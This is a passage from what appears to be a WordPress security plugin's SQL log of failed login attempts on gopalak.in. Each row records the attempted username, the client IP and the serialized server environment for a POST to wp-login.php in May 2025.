s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746731849.3956599;s:12:\"REQUEST_TIME\";i:1746731849;}}','67.223.118.151',0,'2025-05-09 00:47:31','1970-01-01 00:00:00'),(94938,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54762\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.124.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746732408.1885099;s:12:\"REQUEST_TIME\";i:1746732408;}}','167.86.124.24',0,'2025-05-09 00:56:49','1970-01-01 00:00:00'),(94939,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41916\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746732974.7232671;s:12:\"REQUEST_TIME\";i:1746732974;}}','51.178.81.248',0,'2025-05-09 01:06:16','1970-01-01 00:00:00'),(94940,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53844\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746734106.952821;s:12:\"REQUEST_TIME\";i:1746734106;}}','198.54.126.68',0,'2025-05-09 01:25:08','1970-01-01 00:00:00'),(94941,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44082\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746734681.535939;s:12:\"REQUEST_TIME\";i:1746734681;}}','45.67.14.64',0,'2025-05-09 01:34:43','1970-01-01 00:00:00'),(94942,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47636\";s:11:\"REMOTE_ADDR\";s:11:\"34.93.16.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746735255.057945;s:12:\"REQUEST_TIME\";i:1746735255;}}','34.93.16.66',0,'2025-05-09 01:44:16','1970-01-01 00:00:00'),(94943,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56776\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746735815.2952831;s:12:\"REQUEST_TIME\";i:1746735815;}}','15.204.43.173',0,'2025-05-09 01:53:37','1970-01-01 00:00:00'),(94944,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47464\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.105\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736382.356107;s:12:\"REQUEST_TIME\";i:1746736382;}}','162.0.232.105',0,'2025-05-09 02:03:04','1970-01-01 00:00:00'),(94945,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57001\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736813.7208991;s:12:\"REQUEST_TIME\";i:1746736813;}}','35.154.1.88',1,'2025-05-09 02:10:16','2025-05-10 07:10:32'),(94946,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57002\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736813.721431;s:12:\"REQUEST_TIME\";i:1746736813;}}','35.154.1.88',1,'2025-05-09 02:10:16','2025-05-10 07:10:33'),(94947,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57007\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736815.5341649;s:12:\"REQUEST_TIME\";i:1746736815;}}','35.154.1.88',1,'2025-05-09 02:10:17','2025-05-10 07:10:33'),(94948,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57005\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736815.533567;s:12:\"REQUEST_TIME\";i:1746736815;}}','35.154.1.88',1,'2025-05-09 02:10:17','2025-05-10 